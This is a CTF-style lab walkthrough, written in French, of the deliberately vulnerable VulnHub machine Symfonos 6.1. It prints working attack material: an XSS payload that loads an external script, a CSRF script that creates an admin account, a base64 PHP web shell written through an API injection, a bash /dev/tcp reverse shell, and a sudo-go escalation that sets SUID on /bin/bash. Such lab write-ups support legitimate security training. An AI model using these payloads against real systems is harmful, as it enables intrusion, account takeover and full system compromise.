Symfonos: 6.1 VulnHub (Writeup)

Skills:

Web Enumeration
FlySpray Exploitation
Abusing FlySpray - Cross Site Scripting (XSS)
Getting the administrator to create a new privileged user through XSS
Information Leakage
Gitlab Enumeration
Abusing API + Preg_Replace to achieve RCE on the creation of a new post
Abusing sudoers privilege (go) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Reconnaissance de l'adresse IP via arp-scan :

Utilisation de la commande arp-scan pour détecter l'adresse IP de la machine:

arp-scan -I ens33 --localnet --ignoredups

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.71.143 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80,3000,3306,5000 192.168.71.143 -oN targeted

Identification de la version de la machine avec WhatWeb : Utilisation de WhatWeb pour scanner le site internet et identifier la version de la machine (Ubuntu) et d'Apache :

Recherche de répertoires possibles avec Gobuster :

Utilisation de Gobuster pour scanner les répertoires possibles sur le site Web avec le fichier de liste de répertoires moyen. Identification d'un utilisateur potentiellement valide (Achilles).

gobuster dir -u http://192.168.71.143/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20

Identification de la vulnérabilité SSH :

Vérification de la version SSH pour déterminer la vulnérabilité et la validité de l'utilisateur Achilles.

Analyse du serveur avec Wappalyzer :

Utilisation de Wappalyzer pour déterminer que le serveur utilise Apache et le langage de programmation PHP.

Exploration des fichiers PHP :

Recherche de fichiers PHP dans le répertoire "posts" avec Gobuster, mais aucun contenu intéressant n'est trouvé.

gobuster dir -u http://192.168.71.143/posts/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php

Exploration du port 3000 :

Découverte d'un autre site HTTP (un Gitea de version 1.11.4) sur le port 3000. Identification d'un autre utilisateur existant (zayotic).

Exploration approfondie avec un dictionnaire de répertoires plus grand:

Utilisation d'un dictionnaire de répertoires plus grand avec Gobuster pour découvrir de nouveaux répertoires. Identification d'un nouveau répertoire nommé "flyspray".

gobuster dir -u http://192.168.71.143/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -t 20

Analyse de la version de Symfonos:

Recherche sur Internet pour trouver des informations sur la version de Symfonos. Utilisation de Searchsploit pour détecter deux vulnérabilités possibles (XSS et CSRF).

Vulnérabilité XSS :

L'analyse du script de Searchsploit révèle l'existence d'un répertoire permettant une attaque XSS ("/index.php?do=myprofile"), mais nécessitant un compte enregistré sur le site. Par conséquent, enregistrement sur le site.

Identification de la variable "real name" comme étant vulnérable à une attaque XSS.

Validation de l'exploitation avec le payload suivant:

"><script>alert("xss")</script>

Ensuite, force à charger un service JavaScript externe:

"><script src="http://192.168.71.128/pwned.js"></script>

Observation des trames envoyées à un serveur web temporaire créé en Python, confirmant la vulnérabilité XSS.

Vulnérabilité CSRF :

En exploitant la capacité du site à envoyer des requêtes, tentative d'une attaque CSRF dans la zone de commentaire.

Création du fichier JavaScript pwned.js :

Développement d'un fichier JavaScript (pwned.js) pour créer un utilisateur admin à travers d'une attaque CSRF.

var tok = document.getElementsByName('csrftoken')[0].value;

var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">'
txt += '<input type="hidden" name="action" value="admin.newuser"/>'
txt += '<input type="hidden" name="do" value="admin"/>'
txt += '<input type="hidden" name="area" value="newuser"/>'
txt += '<input type="hidden" name="user_name" value="hacker"/>'
txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>'
txt += '<input type="hidden" name="user_pass" value="12345678"/>'
txt += '<input type="hidden" name="user_pass2" value="12345678"/>'
txt += '<input type="hidden" name="real_name" value="root"/>'
txt += '<input type="hidden" name="email_address" value="[email protected]"/'
txt += '<input type="hidden" name="verify_email_address" value="[email protected]"/>'
txt += '<input type="hidden" name="jabber_id" value=""/>'
txt += '<input type="hidden" name="notify_type" value="0"/>'
txt += '<input type="hidden" name="time_zone" value="0"/>'
txt += '<input type="hidden" name="group_in" value="1"/>'
txt += '</form>'

var d1 = document.getElementById('menu');
d1.insertAdjacentHTML('afterend', txt);
document.getElementById("hacked_form").submit();

Connexion avec les nouveaux identifiants :

Utilisation des nouveaux identifiants créés (utilisateur : hacker, mot de passe : 12345678) pour se connecter avec succès.

Une nouvelle tâche apparaît, fournissant des informations sur un utilisateur (Achilles) et son mot de passe (h2sBr9gryBunKdF9).

Exploration du port 3000 :

Connexion réussie au port 3000 avec les nouvelles informations d'identification. Le site ressemble à Github et présente deux projets privés.

Vulnérabilité abus d'API:

Exploration du projet API:

Le fichier .env indique que l'API est sur le port 5000.

Exploration du répertoire principal :

Identification du groupe directory principal ls2o4g.

Exploration des sous-répertoires :

Utilisation de la méthode POST pour chaque login et vérification avec la méthode GET.

Envoi d'une requête avec CURL :

Utilisation de CURL pour envoyer une requête POST contenant les informations d'authentification JSON vers l'URL

curl -s -X POST "http://192.168.71.144:5000/ls2o4g/v1.0/auth/login" -H "Content-Type: application/json" -d '{"username":"achilles", "password":"h2sBr9gryBunKdF9"}' | jq

Récupération du token après l'envoi de la requête:

Tentative d'exploitation du JSON Web Token (JWT) :

Tentative d'exploitation du JWT (id=1), mais échec.

Analyse du fichier posts.go des routes :

Observation des routes pour comprendre l'exigence de l'ID.

Injection de commande via CURL :

Utilisation de CURL avec la méthode PATCH pour envoyer une requête contenant le JWT dans les headers et l'ID dans l'URL avec le mot "testing"

curl -s -X PATCH "http://192.168.71.144:5000/ls2o4g/v1.0/posts/1" -H "Content-Type: application/json" -b 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MDY4MjczOTgsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.PrnCibopZM7JJSw4FmHJ-I4PBxL_8nJ5-TSEWa_e2yo' -d '{"text": "Testing"}'

Envoi d'une commande système (`whoami`) dans le corps de la requête PATCH via CURL.

-d $'{"text": "system(\'whoami\')"}'

curl -s -X PATCH "http://192.168.71.144:5000/ls2o4g/v1.0/posts/1" -H "Content-Type: application/json" -b 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MDY4MjczOTgsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.PrnCibopZM7JJSw4FmHJ-I4PBxL_8nJ5-TSEWa_e2yo' -d $'{"text": "system(\'whoami\')"}'

Préparation d'un reverse shell en PHP :

Création d'un fichier DATA encodé en base64 pour contourner les restrictions de caractères.

<?php
system($_GET['cmd']);
?>

Injection du fichier PHP:

Utilisation de CURL avec la méthode PATCH pour envoyer une requête contenant le token dans les headers et l'ID dans l'URL, avec l'injection du code PHP pour créer un fichier cmd.php.

curl -s -X PATCH "http://192.168.71.144:5000/ls2o4g/v1.0/posts/1" -H "Content-Type: application/json" -b 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MDY4MjczOTgsInVzZXIiOnsiZGlzcGxheV9uYW1lIjoiYWNoaWxsZXMiLCJpZCI6MSwidXNlcm5hbWUiOiJhY2hpbGxlcyJ9fQ.PrnCibopZM7JJSw4FmHJ-I4PBxL_8nJ5-TSEWa_e2yo' -d $'{"text": "file_put_contents(\'cmd.php\', base64_decode(\'PD9waHAKICBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKPz4K\'))"}'

Exécution d'une Reverse Shell pour Accéder à la Machine:

bash -c "bash -i >%26 /dev/tcp/192.168.71.128/443 0>%26 1"

Traitement du Terminal pour Surmonter les Privilèges

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Migration vers l'utilisateur Achilles :

Utilisation des informations d'identification récupérées précédemment pour migrer de l'utilisateur Apache à l'utilisateur Achilles.

Élévation de privilèges (SUDOERS)

Recherche des droits sudoers :

sudo -l

Possibilité d'exécuter Go en tant que root:

Création du fichier root.go :

Déplacement vers le répertoire système /tmp et création d'un fichier root.go avec le code suivant en contenu :

package main

import (
    "log"
    "os/exec"
)

func main() {
	cmd := exec.Command("chmod", "u+s", "/bin/bash")

	err := cmd.Run()
	
	if err != nil {
		log.Fatal(err)
	}
}

Exécution du fichier root.go avec Go :

Utilisation de Go pour exécuter le fichier root.go, qui modifie les permissions de /bin/bash pour permettre à n'importe quel utilisateur de l'exécuter avec les privilèges de l'utilisateur root.

sudo /usr/local/go/bin/go run root.go

Obtention de la flag : )

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagRecherche de répertoires possibles avec Gobuster :

hashtagIdentification de la vulnérabilité SSH :

hashtagAnalyse du serveur avec Wappalyzer :

hashtagExploration des fichiers PHP :

hashtagExploration du port 3000 :

hashtagExploration approfondie avec un dictionnaire de répertoires plus grand:

hashtagAnalyse de la version de Symfonos:

hashtagVulnérabilité XSS :

hashtagIdentification de la variable "real name" comme étant vulnérable à une attaque XSS.

hashtagValidation de l'exploitation avec le payload suivant:

hashtagEnsuite, force à charger un service JavaScript externe:

hashtagVulnérabilité CSRF :

hashtagCréation du fichier JavaScript pwned.js :

hashtagConnexion avec les nouveaux identifiants :

hashtagUne nouvelle tâche apparaît, fournissant des informations sur un utilisateur (Achilles) et son mot de passe (h2sBr9gryBunKdF9).

hashtagExploration du port 3000 :

hashtagVulnérabilité abus d'API:

hashtagExploration du projet API:

hashtagRécupération du token après l'envoi de la requête:

hashtagTentative d'exploitation du JSON Web Token (JWT) :

hashtagEnvoi d'une commande système (whoami) dans le corps de la requête PATCH via CURL.

hashtagInjection du fichier PHP:

hashtagTraitement du Terminal pour Surmonter les Privilèges

hashtagMigration vers l'utilisateur Achilles :

hashtagÉlévation de privilèges (SUDOERS)

Reconnaissance:

Recherche de répertoires possibles avec Gobuster :

Identification de la vulnérabilité SSH :

Analyse du serveur avec Wappalyzer :

Exploration des fichiers PHP :

Exploration du port 3000 :

Exploration approfondie avec un dictionnaire de répertoires plus grand:

Analyse de la version de Symfonos:

Vulnérabilité XSS :

Identification de la variable "real name" comme étant vulnérable à une attaque XSS.

Validation de l'exploitation avec le payload suivant:

Ensuite, force à charger un service JavaScript externe:

Vulnérabilité CSRF :

Création du fichier JavaScript pwned.js :

Connexion avec les nouveaux identifiants :

Une nouvelle tâche apparaît, fournissant des informations sur un utilisateur (Achilles) et son mot de passe (h2sBr9gryBunKdF9).

Exploration du port 3000 :

Vulnérabilité abus d'API:

Exploration du projet API:

Récupération du token après l'envoi de la requête:

Tentative d'exploitation du JSON Web Token (JWT) :

Envoi d'une commande système (`whoami`) dans le corps de la requête PATCH via CURL.

Injection du fichier PHP:

Traitement du Terminal pour Surmonter les Privilèges

Migration vers l'utilisateur Achilles :

Élévation de privilèges (SUDOERS)